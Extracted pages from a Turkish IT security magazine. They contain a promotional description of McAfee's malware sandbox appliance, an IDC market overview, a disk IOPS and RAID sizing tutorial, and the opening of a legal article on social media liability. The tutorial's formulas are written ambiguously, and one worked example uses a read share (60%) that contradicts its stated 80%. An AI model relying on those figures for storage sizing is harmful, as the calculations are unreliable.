güvenliğini sağlamaya yönelik yazılım veya donanımlar tarafından kontrol edilmelidir. Kullanılmayan stored procedureler kaldırılmalıdır. Kasım 2013 beyaz şapka 11
Serkan Kırmızıgül serkan_kirmizigul@mcafee.com McAfee Advanced Threat Defense McAfee Advanced Threat Defense ürün ailesi ile son kullanıcıların detaylı malware araştırma yapmasının yanında, bilinmeyen zararlıların ağ içerisinde yayılımınıda engelliyor. McAfee Advanced Threat Defense McAfee 2012 yılında, malware tespit konusunda sandbox teknolojisine sahip ValidEdge firmasını satın alarak Advanced Malware departmanına ilave etti. 2011 de Gartner tarafından değerlendirilen firma 2004 yılından bu yana birçok büyük firma ve kurumların ağlarında transparent olarak malware araştırması yapan bir ürün olarak çalışa gelmesinin yanında, birçok antivirüs firmasının malware tespit laboratuvarlarında kullanılan araçların başında gelmektedir. 1 yıllık geliştirme süreci sonunda ValidEdge teknolojisi McAfee Advanced Treat Defense ismiyle son müşterilerin kullanımına sunulmuş durumdadır. Çözüm şu anda McAfee tarafından 2 farklı appliance ile sunulmakta olup özetle; MATD 3000: Maximum 30 sanal sistem ve üzerinde günde maximum 150.000 obje ve 25.000 dosya analiz edilebilir. MATD 6000: Maximum 60 sanal sistem ve üzerinde günde maximum 250.000 obje ve 50.000 dosya analiz edilebilir yapıdadır. Sunulan appliance lar üzerinde sıkıştırılmış 64 bit linux OS ile birlikte hypervisor tip-1 desteği verilmektedir. Sanal sistemler üzerinde Windows ve Android işletim sistemleri koşabilmektedir. Hazır ve özelleştirilebilen işletim sistemlerinin yanında kurumsal işletim sistemlerinin imajları sisteme tanıtılabilmektedir. Operasyonel kullanım tipi olarak şu anda standalone kullanım yönteminin yanında McAfee WebGateway ve McAfee Network IPS ürünleri ile herhangi bir ek maliyete neden olmadan entegre çalışabilmektedir. Ayrıca donanımlar kısa dönem yol haritası içerisinde, span ve inline modlarını da destekler hale gelecektir. İnternet olmayan kapalı ağ kullanım metodu destekleniyor olup üzerinde HTTP, SMTP, FTP, TELNET ve DNS servislerini simule edilebilmekte dolayısıyla fiziksel internet ihtiyacına gerek kalmamaktadır. 12 beyaz şapka Kasım 2013
Malware analiz noktasında barındırdığı teknikler özellikle diğer benzer üreticilere göre farklılık göstermektedir. Başlıca analiz tipleri şöyle özetlenebilir; Local Whitelist (McAfee Application Control veri tabanını kullanıyor olup temiz olduğu bilinen dosyaların hash bilgilerini içermektedir.) Local Blacklist McAfee AV Scan McAfee GTI reputation McAfee Gateway Antimalware Sandbox Analisys Yara Rules (http://code.google.com/p/yara-project/ ) GTI Query/Update Hâlihazırda piyasada kullanılan malware tespit analiz ürünlerinin ürettiği tespit rapor sonuçları ile McAfee nin son dönemde sunduğu ve MATD çözümü içerisinde de kullanılan McAfee GAM (hâlihazırda McAfee Web Gateway ve McAfee Network IPS tarafından kullanılmaktadır) motorunun ürettiği raporlar arasındaki farklar neredeyse %5-10 seviyelerinde iken MATD deki diğer teknikler dikkate alındığı durumlardaki sonuçlar ise sektör ortalamalarının üzerine ulaşmaktadır. Dinamik ve statik analizler bir arada kullanılabilir yapıda olup genel teknikler şöyle özetlenebilir; Dinamik Analiz Metodu: Registry değişimlerinin gözlenmesi Kasım 2013 beyaz şapka 13
Serkan Kırmızıgül serkan_kirmizigul@mcafee.com Ağ bağlantılarının gözlenmesi İşletim sistemi Process lerinin gözlenmesi Dosya sistem değişikliklerinin gözlenmesi Statik Analiz Metodu: (Alınan kaynak kod üzerinde) Direk analiz Kodun parçalara ayrıştırılması Ayrılan parçalar üzerinde analiz Tespit edilen kod parçalarının ne yaptığının anlaşılması Malware in sınıflandırılması Özellikle statik analiz sırasında unpack yöntemini incelemelerde kullanabilmesi upx gibi sıkıştırma ve atlatma tekniklerini kullanan kodların tam olarak incelenmesine imkân sağlamaktadır. Kodların sandbox yöntemi ile çalıştırıldığı senaryolarda sistem yöneticisi isterse kodun son kullanıcı sistemindeki davranışlarını ilgili sanal makinaya uzak bağlantı yaparak izleyebilmektedir. Desteklenen dosya tipleri ise şöyledir: dosyalar analiz için restful API ile MATD ye tekrar analiz için gönderilir. Gönderilen dosyalar Web Gateway tarafından kullanılan analiz metotlarından tekrar geçirilmez sandbox ve Yara gibi diğer tekniklerle analiz için detaylandırılır.(mwg 7.4 sürümü ile birlikte).değerlendirme sonucunda malware olarak kabul edilen kodun hash bilgisi MWG tarafına aktarılır ve bundan sonra benzer file-hash bilgisinin tespit edilmesi durumunda otomatik dosya engellenir. MWG in detaylı kural alt yapısı farklı tekniklerle tespit edilen zararlı dosyaların HASH bilgilerinin manual olarak tanımlanan listeler yoluyla engellenmesini de desteklediğini hatırlatmak isterim. MWG üzerinde SSL Inspection açılması durumunda ise HTTPS protokolü içinde benzer senaryolar işletilebilmektedir. Entegrasyon ile birlikte MWG üzerinde yeni log kayıt tipi tanımlanmış olup (atdscan.log) source ip, file name, URL ve hash bilgisi gibi önemli bilgiler içermektedir. Network Security Platform (NIPS): MATD nin NSP üzerinde aktifleştirilmesi durumunda NTBA üzerindeki GAM engine otomatik disable edilir. Desteklenen dosya tipleri MATD ye iletilir. Executables (.exe,.dll,.scr,.ocx,.sys,.com,.drv,.cpl) MS Office Files (.doc,.docx,.xls,.xlsx..ppt,.pptx) PDF Files Compressed Files (.zip,.rar) Android Application Package (.apk) Java Archives (JAR) Mevcut McAfee ürünleri ile ilgili entegrasyon detayları ise şöyle özetlenebilir: McAfee Web Gateway: MWG ürün ailesi sektördeki en güçlü malware tespit motorlarına sahip olup bunların başında GTI reputation teknikleri ve McAfee GAM motoru gelmektedir. Bu motorlar tarafından %60 seviyesinde süphenilen 14 beyaz şapka Kasım 2013
Göderilen dosyanın son byte bilgisi MATD tarafından veri tabanındaki malware örnek dosyaları tarafından kontrol edilir. Eğer bilgi yok ise analiz için kuyruğa alınır. Analiz sonuçlarına istinaden custom finger print bilgisi NSM tarafında oluşur ve benzer dosya hareketleri bu aşamadan itibaren IPS tarafından engellenebilir seviyeye çekilmiş olur (Version 8). Desteklenen bu senaryolara ek olarak McAfee, Firewall teknolojisinde kullandığı Network Integrity Agent i geliştirilerek McAfee Endpoint Intelligence (EIA) ismiyle Network IPS teknolojisinde kullanmaya başladı. Bu yolla NSP, epo ve EIA birlikteliği, zararlı kodun ve hash in son kullanıcı makinasından aslında hangi gerçek process tarafından kullanıldığı bilgisini üretebilmekte ve epo yoluyla raporlayabilmektedir. epo ve realtime epo entegrasyonunun sonuçlanmasına istinaden epo ve EIA yoluyla toplanan bilgilere istinaden MATD üzerinde hedefe dönük analizler yapılabilecek sonucunda yüksek performans ile kesin kod tespiti sağlanacaktır. epo-realtime ile birlikte zararlının bulunduğu makinada process name, image path, hash of process, file name ve registry key bilgileri anlık raporlanabilecektir. Sonraki adım ise otomatik olarak son kullanıcı sistemlerindeki bu zararlıların temizlenmesi olacaktır. McAfee MATD yi son derece stratejik bir teknoloji olarak görmekte buna istinaden birçok ürünün entegrasyonunu yol haritası içerisinde önceliklendirmiş durumdadır. Önceliklendirilmiş ürün entegrasyonları McAfee Email Gateway, McAfee Entrprise Firewall, McAfee SaaS, McAfee epo ve epo realtime olarak sıralanabilir. Anlaşılır, detaylı raporlama imkanları, kolay entegrasyon ve yönetim senaryoları ile MATD çözümü, çok iyi analitik engine leri ile mevcut McAfee müşterileri açısından uygun fiyat ve lisanslama modeli ile yüksek fayda getireceği açıktır. Lütfen detaylı bilgi için benimle temasa geçmekte tereddüt etmeyin. Kasım 2013 beyaz şapka 15
Ramazan Yavuz, Yeşim Araç ryavuz@idc.com, yarac@idc.com Ramazan Yavuz, Kıdemli Araştırma Analisti, Güvenlik Donanımları Yeşim Araç, Araştırma Analisti, Yazılım ve BT Hizmetleri Türkiye Güvenlik Sektörüne Global Bir Bakış Bilişim teknolojilerindeki yeni gereksinimler ve çok hızlı değişim BT dünyasında köklü paradigma değişikliklerine neden oluyor. Türkiye bu değişimin neresinde yer almaktadır ve güvenlik sektörü teknolojileri ne yönde hareket etmektedir? Her geçen gün gelişen yeni BT uygulamaları BT güvenliğinde yeni yaklaşımlar ve öncelikler getirmektedir. Firmaların iletişim ve iş yapma biçimleri yeni teknolojilerle değiştikçe, BT güvenliğini sağlamak daha karmaşık bir hale geliyor. Şirketlerin sanallaştırma, sanal ofisler, bulut bilişim ve daha birçok teknolojiyle evrimleşen BT altyapılarında, BT güvenliği artık izole bir alan olmaktan çıktı. Bugünün şirketleri BT güvenliği stratejilerini oluştururken tüm bu teknolojilerin ve yeniliklerin ışığında düşünmek durumundadırlar. IDC olarak bu yazımızda güvenlik yazılımları ve güvenlik donanımları başlıkları altında güvenlik sektöründeki ana trend ve yaklaşımları, bunların güvenlik ve is stratejilerine nasıl imkanlar tanıdığını ve kullanıcı ve firmalar tarafında nasıl algılandıklarını aktaracağız. A. Türkiye Güvenlik Sektöründe Yazılım Türkiye'de güvenlik yazılımlarının önemi gün geçtikçe artıyor ve bilinç oluşturulması için yıllardır yapılan çalışmalar artık meyvesini veriyor. Her ölçekteki şirket belirli büyüklüklerde güvenlik yazılımları yatırımı yapması gerektiğinin bilincinde ve bu doğrultuda harekete geçiyor. Ülkemizde güvenlik yazılımlarına "olsa iyi olur" ancak "olmasa da olur" diye bakılırken artık bu görüş "kesinlikle olmalı" yönüne doğru kayıyor. Bu yönelimi güvenlik yazılımları pazarının büyüme trendine ve tahminlere bakarak açık bir şekilde görebiliriz. Rekabetin yüksek olduğu güvenlik yazılımları pazarında "Güvenli İçerik ve Tehdit Yönetimi" yatırımları büyük bir farkla birinci sırada yer alıyor. Güvenli içerik ve tehdit yönetimi, son kullanıcı güvenliği, ağ güvenliği, mesajlaşma güvenliği ve web güvenliği alt başlıklarını kapsıyor. Bir başka başlık olan "Güvenlik yönetimi" yatırımları ise ikinci sırada yer alıyor ve yama yönetimi, güvenlik loglarının korelasyonu gibi yazılımları içeriyor. Ülkemizde uzun sürelerdir yatırım yapılan diğer bir konu ise kimlik ve erişim yönetimidir ve güvenlik yönetimi yatırımlarını takip etmektedir. Kimlik ve erişim yönetimi, bir organizasyonun bütün birimlerini kapsadığı için süreçler uzun sürmekte, bu da projelerdeki başarı oranlarını düşürmektedir. Bir organizasyonda yer alan projeyle ilgili birimlerin bu projeyi benimsemesi ve kimlik ve erişim yönetimi konusunda bilgilenip, bilinçlenmesi sağlanırsa başarılı projeler gerçekleşecektir. Sektör bazında değerlendirecek olursak güvenlik yazılımlarının en büyük yatırımcısı finans sektörüdür, sonra sırayla kamu sektörü ve telekom sektörü gelmektedir. Finans sektöründeki yatırımın fazla olmasının önemli bir sebebi hızla yeni banka şubelerinin açılması ve dolayısıyla güvenlik yazılımlarına olan ihtiyaç hacminin genişlemesinden kaynaklanmaktadır. Özellikle bankalar müşterilerine güvenli erişim sunabilmek için çeşitli güvenlik yazılımları kullanmaktadırlar. Bu gibi sektörlerin yatırımlarını, siber suçların artması, bilgi güvenliğine yönelik tehditler ve regülasyonlar tetiklemektedir. Bulut ve sanallaştırma gibi teknolojiler ve mobil cihazların kullanımındaki hızlı artış da kurumlardaki güvenlik tehditlerini arttırmakta ve çeşitli güvenlik önlemlerinin alınmasını gerektirmektedir. Güvenlik yazılımları pazarındaki en büyük engellerden biri ise kalifiye çalışan sayısının az olması ve niş olarak tanımlanan trendler ve ürünler için gerekli yeterliliğe sahip iş ortaklarının üreticiler tarafından bulunamamasıdır. Bu nedenle üreticiler partnerlerinin eğitim sürecini desteklemeli, güvenlik yazılımları sektöründe kalifiye çalışan oranının artmasına katkıda bulunmalıdırlar. Güvenlik yazılımı üreticileri etkinlikler ve çeşitli yayınlarla gerçekleştirdikleri pazarlama faaliyetlerinde müşterileri olabildiğince bilinçlendirme ve bilgilendirme amacında olmalıdırlar. Müşteriler ise yeni trendleri takip etmeli, bilgilenmeli ve güvenliği artık bir gereklilik olarak görmelidirler. Gerekliliğine inandıkları güvenlik yazılımlarına yatırım yaparak önlemlerini herhangi bir güvenlik tehdidiyle karşılaşmadan önce almalıdırlar. B. Türkiye Güvenlik Sektöründe Donanım Tarihsel olarak firewall donanımları, Türkiye de en popüler ve en çok uygulanan güvenlik çözümlerinden biriydi. Geçtiğimiz yıllarda BT güvenlik pazarı değişik güvenlik fonksiyonlarını kombine eden, Firewall ile Sanal Özel Ağ (VPN), Saldırı Sezme ile Önleme Sistemleri (IDP) ve Birleşik Tehdit Önleme Yönetimleri (UTM) donanımları gibi, donanımlara yönelmiş durumda. Güvenlik donanımı çözümlerine olan talep arttıkça; çok işlevli güvenlik donanımları, hâlihazırda pazar payı kaybeden Saldırı Sezme (IPS), Saldırı Önleme (IDS) sistemleri ve Sanal Özel Ağlar (VPN) gibi tek işlevli donanımların pazar payını azaltmaktadır. Güvenlik tehditleri daha karmaşık ve daha güçlü hale geldikçe, 16 beyaz şapka Kasım 2013
tek bir platform üstünde birçok işlevi birleştiren daha güçlü ve tüm sistemlere entegre olan güvenlik çözümlerinin önemi de artmaktadır. Bu etmen, Türk şirketlerinin birçok fonksiyonu birleştiren donanımları tercih etmesinin nedenlerinden biridir. bütün işlevlerin kullanılıp kullanılmaması değil, şirketlerin tüm önemli BT güvenliği risklerini yeteri kadar değerlendirip değerlendiremediğidir. UTM, Firewall ve diğer güvenlik donanımları BT güvenlik sisteminin bir parçasıdır. Bu çözümler gereklidir fakat bilgisayar ve bilgisayar ağlarının etkili güvenliğini sağlamak için yeterli önlemler değildir. Kendi-Cihazını-Getir trendi veya kurumsal ağlara bağlanan cihaz sayısındaki sürekli artıştan kaynaklanan değişiklikler gibi etmenler kullanıcı davranışlarında değişikliklere neden olmaktadır. Bunun gibi çok hızlı değişen modern şartlar; BT güvenliği sorumlularının bu tür değişimlerden kaynaklanan tehditleri saptamalarını ve olası problemleri önlemek için gerekli önlemleri planlamalarını gerektirmektedir. Etkili bir güvenlik yönetimi için en önemli üç adım şu şekilde tanımlanabilir: - Tam risk değerlendirmesi - İlgili güvenlik prosedürlerinin işletilmesi - Kullanıcı eğitimi. Gerçekten de tek işlevli güvenlik donanımları ile karşılaştırıldıklarında, çok işlevli donanımlar hem kolayca uygulanabilmeleri hem de geniş bir spektrumda koruma sağlamaları açısından daha fazla ön plana çıkmaktadırlar. Ayrıca bu donanımlar şirketlerin kurulum, bakım ve yönetim servislerini gerçekleştiren BT çalışanlarının sayısını azaltmasına olanak tanımaktadır. Bu etmen özellikle değişik coğrafi noktalarda uzak ofisi olan şirketler için önem arz etmektedir. Hâlihazırda üreticiler çok işlevli donanımları kobilerden veri merkezlerine ve devlet kurumlarına kadar tüm segmentlere sunmaktadır. Bu ürünler tüm son kullanıcı segmentlerinin ihtiyaçlarını karşılayacak şekilde konumlandırılmaktadır. Modern çok işlevli donanımlar ölçeklenebilmektedir, şirketlerin ve kurumların değişen ihtiyaçlarına ve kurumsal güvenlik stratejilerindeki değişikliklere uyum sağlayacak özellikleri barındırmaktadır. Şirketler donanımda kullanmak istedikleri özellikleri satın alabilir ve ileride ihtiyaç duyuldukça URL filtreleme, antivirus, antispam gibi diğer ilave fonksiyonları kullanıma açabilir ya da ilgili yazılım modüllerini satın alabilirler. Aynı zamanda yüksek oranda entegre edilebilen donanımlar bazı potansiyel güçlükleri de barındırmaktadır. Örneğin, donanım çalışmadığında, bütün ağ cihaz onarılıncaya ya da değiştirilinceye kadar korumasız kalacaktır. Bu cihazların diğer bir kısıtı ise büyüyen şirketler için yeterli esnekliği sağlayamamalarıdır. Eğer ağ trafiği hızlı artarsa, donanım bu hızlı artışla baş edemeyebilir. Bu da şirketin tüm donanım sistemini yenilemesi anlamına gelir ki bunun maliyetli olacağı açıktır. Türkiye de çok işlevli donanımlara duyulan talebin artıyor olması şirketlerin entegre edilebilirlik ve basit uygulanabilirlik gibi faydalardan yararlanabilmek için farklı güvenlik fonksiyonlarını hazır bulundurmaya önem verdiklerini göstermektedir. Bununla beraber asıl sorulması gereken soru güvenlik donanımlarında bulunan BT güvenliği yönetmelikleri ve standartları (PCI-DCC, ISO/IEC 27001, NIST ve diğerleri) güvenli bir BT sistemi geliştirmek için kılavuz oluşturmaktadır. BT güvenliği denetimleri ve akredite organizasyonlar tarafından verilen sertifikasyonlar şirket ve kurumlardaki BT güvenliğinin kabul gören standartları karşılamasına yardımcı olmaktadır. Güvenlik donanımları etkili bir güvenlik konseptinin sadece bir parçasıdır ve tüm BT güvenlik sistemi kapsamında değerlendirilmelidirler. Özetle, şirketler maruz oldukları tehditlere uygun güvenlik çözümleri geliştirmelidir. Bu çözümler donanım yazılım, bulut servisleri, ya da bunların bir bileşimi olabilir. Türkiye de donanım çözümleri BT güvenliğinde tercih edilmektedir. Donanım çözümleri içerisinde ise çok işlevli donanımlar tek işlevli donanımlara tercih edilmektedir. UTM donanımları için talep önemli oranda orta ve küçük ölçekli firmalardan gelmektedir. Bununla beraber, mobil teknolojilerin ve güvenlik çözümlerinin gelişmesiyle beraber bulut servislerinin de gelecekte bu segmentlerde de önemli olacağı açıktır. IDC International Data Corporation (IDC), bilgi teknolojileri, telekomünikasyon ve tüketici teknolojileri alanlarında pazar araştırması, danışmanlık ve etkinlik hizmetleri sunan, önde gelen küresel pazar araştırma firmasıdır. IDC, BT çalışanlarının, şirket yöneticilerinin ve yatırım çevrelerinin teknoloji harcamalarında ve ticari stratejilerini belirlemede gerçeklere dayalı kararlar almalarına yardımcı olur. Dünya çapında 110 un üzerinde ülkede, 1000'den fazla IDC analisti teknoloji, sektörel fırsatlar ve trendler hakkında küresel, bölgesel ve yerel uzmanlık sunmaktadır. IDC, 48 yılı aşkın bir süredir müşterilerine stratejik bilgiler sunarak, iş hedeflerine ulaşmalarına yardımcı olmaktadır. IDC, bilgi teknolojileri medyası, araştırma ve etkinlik alanında dünyanın lider kuruluşu olan IDG nin bir yan şirketidir. Mayıs 2013 beyaz şapka 17
Tarkan Çiçek tarkan.cicek@nebulabilisim.com.tr Disk Veri Depolama Sistemleri (devam): Disk Performans Hesaplamaları: Bilgisayar sistemlerinde performansı etkileyen dört ana faktör vardır. Bunlar; 1. İşlemci 2. Bellek 3. Ağ bağlantısı 4. Disk Konumuz gereği biz son madde üzerinde duracağız. Yani saniyede yapılan giriş çıkış işlem sayısı daha bilinen adı ile IOPS (Input Output Per Second). Bir örnek ile durumu açıklayalım; Seagate.com dan aldığımız 2.5 ve10krpm Savvio disklerin bilgileri ile; Ortalama Erişim Süresi: 3.6ms (3.4-3.8) Gecikme Süresi: 3ms 1 / ((3 + 3.6)/1000) = 1 / 0.0066 = 150 IOPS Bu değerde genel kabul gören değerlere denk geliyor. Aşağıda mevcut diskler için genel kabul gören bu değerleri tablo olarak veriyorum. Kullanmakta olduğumuz disklerin yapabildiği IOPS miktarı tek başlarına basit bir formül ile hesaplanabilir. Bu formül 1 saniyenin diskin dataya ortalama erişim süresi ile bölünmesidir. Bu şekilde 1 saniye içinde disk üzerindeki bir veriye kaç defa erişilebileceği hesaplanmış olur. Disk üreticileri averaj erişim sürelerini milisaniye (1/1000sn) cinsinden verdiklerinden önce averaj erişim süresi değerinin saniyeye çevrilmesi yani 1000 e bölünmesi ile elde edilen değerin 1/x olarak kullanılması gerekir. Disklerdeki averaj erişim süresi ise; Average Seek Time (ortalama erişim süresi) + Average Latency (ortalama gecikme) şeklinde hesaplanır. Sırası gelmişken geriye dönerek bir hatırlatma yapalım. Hatırlarsanız iki önceki sayıda diskin temel yapılarından bahsederken Track (iz), Head (kafa), Sector (sektör) terimlerinden bahsetmiştik. Seek Time, kafanın istenilen bilginin olduğu ize varması için geçen zamanı, Average Latency ise kafanın ilgili ize geldikten sonra istenilen bilginin okunmasına kadar geçen süreyi belirler. Bu değerlerin de sıfır bayt transferler ile ölçülen değerler olduğunu belirtmemde fayda var. Okunan/yazılan blok büyüklüğü arttıkça değerler azalır. Disk sektör büyüklüğünün 512B olduğunu yani en ufak okunabilecek bilgi büyüklüğünün 0.5K olduğunu, 0.5K-128K aralığında %10 luk bir geri gelme yaşandığını not edelim. Yani 0.5K için 100 olan değer 128K için 90 a inmektedir. Raid Performans Hesaplamaları: Tek başına kullanıldığında standart disklerin performansları gördüğünüz üzere öyle kayda değer ölçüde değiller. Eğer bir sunucu, iş istasyonu veya PC üzerinde yüksek disk performansına ihtiyaç duyuyorsanız bunu SSD haricinde tek bir sabit disk ile çözmeniz mümkün olmayacaktır. Performansı arttırmak için disklerin paralel olarak yazma okuma yapabilecek şekilde bir araya getirilmesi gerekir. Bunun içinde RAID yapıları kullanılır. Raid yapıları daha önce değindiğimiz üzere, diskleri performans ve kapasite elde etmek üzere kümeler içinde barındıran yapılardır. Raid0 hariç tüm Raid yapılarında küme içindeki 1 veya daha fazla diskin hatası düzeltilebilir (Raid yapılarını önceki sayılardan okuyabilirsiniz). Raid yapılarında Raid modelinden bağımsız olarak grup içinde kullanılan aktif disk adedi ile kullanılan disk modelinin IOPS u çarpıldığında toplam okuma IOPS değerini verir. Yani Raid0 ve 10 Adet 10K disk kullanıyorsanız 10x150 = 1,500 IOPS okuma performansı elde edebilirsiniz. Yazma IOPS değerini ise Raid0 haricindeki yapılarda formül ile hesaplamamız gerekir. Bunun nedeni kullanılan 18 beyaz şapka Kasım 2013
Raid tipine göre yazma işlemlerinin bir yazma penaltısına neden olmasıdır. Bu penaltı değerleri ise; Raid 0 = 0 Raid 1 = 2 Raid 5 = 4 Raid 6 = 6 Bu değerlere göre 10 adet 10K lık disk kullandığımızda ve %100 yazma işlemi yaptığımızda elde edeceğimiz IO değerleri şu şekilde olacaktır. Şimdi bir diğer soruya da cevap vermek gerekiyor Elimdeki veri depolama ünitesinin performansını nasıl hesaplarım? Bunu hesaplamak için aşağıdaki formülü kullanıyoruz. d = Disk adedi IOPS= d*dio %o+(p*%y) Bunu bir örnekle açıklayalım Örnek: Elimizde 48 Diskli, 15Krpm SAS diskleri olan ve tüm yapısı Raid5 ile oluşturulmuş, %25 yazma, %75 okuma yükü olan bir depolama ünitesinden ne kadar IOPS elde edebiliriz? IOPS = 48 * 210 / 0.75 + (4 * 0.25) IOPS = 10,080 / 1.75 IOPS = 5.760 Aynı sistemi Raid 10 ile kullanıyor olsaydık; IOPS = 48 * 210 / 0.75 + (2 * 0.25) IOPS = 10,080 / 1.25 IOPS = 8,064 Yeni bir veri depolama sistemi alırken yaklaşık ne kadar diske ihtiyaç duyacağımızı da farklı bir formülle hesaplayabiliriz. Öncelikle ihtiyacımız olan IO miktarını ve blok büyüklüklerini hesaplayıp ardından kullanmamız gereken disk miktarını aşağıdaki formüle uygulayarak bulabiliriz. Okuma ve yazma IOPS ları farklı hesaplandığından istediğimiz IO değeri için yüzde olarak ne kadar yazma ve ne kadar okuma yapacağımızı da belirlememiz faydalı olacaktır. Mevcut yapınızdaki yazma ve okuma oranlarını bilmiyorsanız Perfmon ile disk performans bilgilerini aldıktan sonra. Yazma ve Okuma IO değerleri ile şu formülü uygulayarak oranları çıkarabilirsiniz. %Yazma (%y) = %Okuma (%o) = Disk Writes/sec Disk Transfer/Sec Disk Reads/sec Disk Transfer/Sec Gerekli disk adedinin hesabı için kullanacağımız Formül ise: gio = Gereken IOPS iio = İstenilen IOPS %y = Yazma Oranı P = Yazma Penaltısı %o = %Okuma dio = Disk başına IOPS miktarı gio=(iio*%o)+(iio*%y*p) Gerekli Disk Adedi = gio dio Birim Disk Kapasitesi = İstenilen Ham Kapasite / Gereken Disk Adedi Örnek1: İhtiyaç; 20TB Ham Kapasite, iio=10,000 IOPS, 16K Blok, %40 Yazma, %60 Okuma Kullanılacak Disk: 2.5 10K Disk, 16K için performans değeri = 145 IOPS Raid 5 için; Gereken IOPS = (10,000 * %40 * 4) + (10,000 * %60) Gereken IOPS = 16,000 + 6,000 = 22,000 Gerekli Disk Adedi = 22,000 / 145 = 152 Adet Birim Disk Kapasitesi = 20,000 / 152 = 132GB Raid 10 için; Gereken IOPS = (10,000 * %40 * 2) + (10,000 * %60) Gereken IOPS = 8,000 + 6,000 = 14,000 Gerekli Disk Adedi = 14,000 / 145 = 97Adet Birim Disk Kapasitesi = 20,000 / 97 = 206GB Raid 6 için; Gereken IOPS = (10,000 * %40 * 6)+(10,000 * %60) Gereken IOPS = 24,000 + 6,000 = 30,000 Gerekli Disk Adedi = 30,000 / 145 = 202 Adet Birim Disk Kapasitesi = 20,000 / 202 = 100GB Örnek2: İhtiyaç; 20TB Ham Kapasite, iio=10,000 IOPS, 4K Blok, %20 Yazma, %80 Okuma Kullanılacak Disk: 2.5 10K Disk, 4K için performans değeri = 145 IOPS Raid 5 için; Gereken IOPS = (10,000 * %20 * 4) + (10,000 * %60) Gereken IOPS = 8,000 + 6,000 = 14,000 Gerekli Disk Adedi = 14,000 / 145 = 97 Adet Birim Disk Kapasitesi = 20,000 / 97 = 206GB Yukarıdaki hesaplamalar temel hesaplama kriterleri gözetilerek ve klasik sabit disklerin kullanımı göz önünde bulundurularak yapılmıştır. Buradaki hesaplamalarda yazma ve okumada kullanılacak önbellek miktarı, Depolama sisteminin başarımı, gecikmeler, önbellekten okuma/yazma oranları, SSD disk kullanımı, Tiering vb. yeni yapılar dikkate alınmamıştır. Temel veri depolama performans hesaplaması bu şekilde yapılmaktadır. Burada elde edilen değer kullanılan disk adedi ve Raid yapısına göre diğer değişkenlerden bağımsız olarak alınması beklenen IOPS performans değerini verir. Yeni ürünlere ve teknolojilere göre diğer değişkenleri de katarak yapılacak hesaplamaları üreticilerin kendilerine veya çözüm ortaklarına yaptırmak daha doğru olacaktır. Çünkü bu değerler ve başarımlar her ürüne göre farklılıklar gösterebilir. Kasım 2013 beyaz şapka 19
Av. Mehmet Bedii Kaya mehmet@mbkaya.com İstanbul Bilgi Üniversitesi Bilişim ve Teknoloji Hukuku Enstitüsü, Öğretim Görevlisi Sosyal Medya Paylaşımları Sebebiyle Hukuki Sorumluluk * Sosyal medyada yapılan paylaşımlar sebebiyle hukuki ve cezai sorumluluğun sınırları nelerdir? Başkasına ait içeriği paylaşma hukuki veya cezai sorumluluğa sebep olur mu? İnternet kullanımının yaygınlaşmasıyla birlikte İnternet kullanıcılarının hukuki ve cezai sorumluluklarının hangi esaslara tabi olacağı dünyada olduğu gibi Türkiye'de de önemli bir tartışma konusu olmuştur. Türk hukukunda İnternet içeriği sebebiyle sorumluluk rejimi İnternetin kullanım alanlarının yaygınlaşmasıyla aynı doğrultuda gelişmiştir. Sosyal medya kullanımının yaygınlaşması ve kitlesel örgütlenmedeki etkisi sorumluluk rejimine yeni bir boyut kazandırmıştır. Nihayetinde sosyal medya siteleri bireylere kendilerini ifade olanağı sağladığı gibi, farklı konumlardaki bireylerin hızlıca örgütlenmelerini, ortak bir payda altında ittifaklar kurmalarını ve kitlesel tepki koymalarını sağlamaktadır. Bu bağlamda, sosyal medyada yapılan paylaşımlar sebebiyle hukuki ve cezai sorumluluğun sınırlarının neler olduğu ve özellikle başkasına ait içeriği paylaşmanın hukuki sorumluluğa sebep olup olmayacağı son dönemde önemli bir gündem konusu olmuştur. Sorumluluk rejiminin Türk hukukundaki gelişmesi üç ana safhada değerlendirilebilir: İlk safha Türkiye nin İnternet ağına dâhil olduğu 1993 yılında başlamıştır. 2000 yılına kadar devam eden bu safhada İnternet sınırlı bir akademik ve kamusal kitleye hitap ettiği için İnternet içeriği sebebiyle sorumluluk rejimi yeterince tartışılmamış ve bu konuda esaslı sorunlar yaşanmamıştır. İkinci safha DSL bağlantıların ucuzlamaya ve yaygınlaşmaya başladığı 2000 yılında başlamıştır. Bu aşamadan itibaren İnternetin hangi rejime tabi olacağı ve İnternet içeriği sebebiyle hukuki ve cezai sorumluluk çeşitli davalarda tartışılmaya başlanmıştır. Algılama ve belirsizlik süresi olarak nitelendirebileceğimiz bu ikinci safhanın 2006 yılının sonuna kadar devam ettiğini söyleyebiliriz. Bu aşamada İnternet içeriği nedeniyle hukuki sorumluluk İnternete özel bir yasal düzenlemeyle değil, mevcut yasal düzenlemelerin İnternete uygulanması suretiyle gerçekleşmiştir. Üçüncü safha ise 2006 yılından bugüne devam eden safhadır. Bu safhanın odak noktasını bilişim suçları ve çocuk pornografisi tartışmaları oluşturmaktadır. Bilişim suçlarının ve İnternet üzerinden yayılan çocuk pornografisinin oluşturduğu tehlikenin medyada uzun süre gündem oluşturması, bu konuda özel bir yasal düzenlemeye gidilmesi konusunda önemli bir reform dinamiği olmuştur. Bu doğrultuda farklı kanun tasarı ve teklifleri hazırlanmış- 20 beyaz şapka Kasım 2013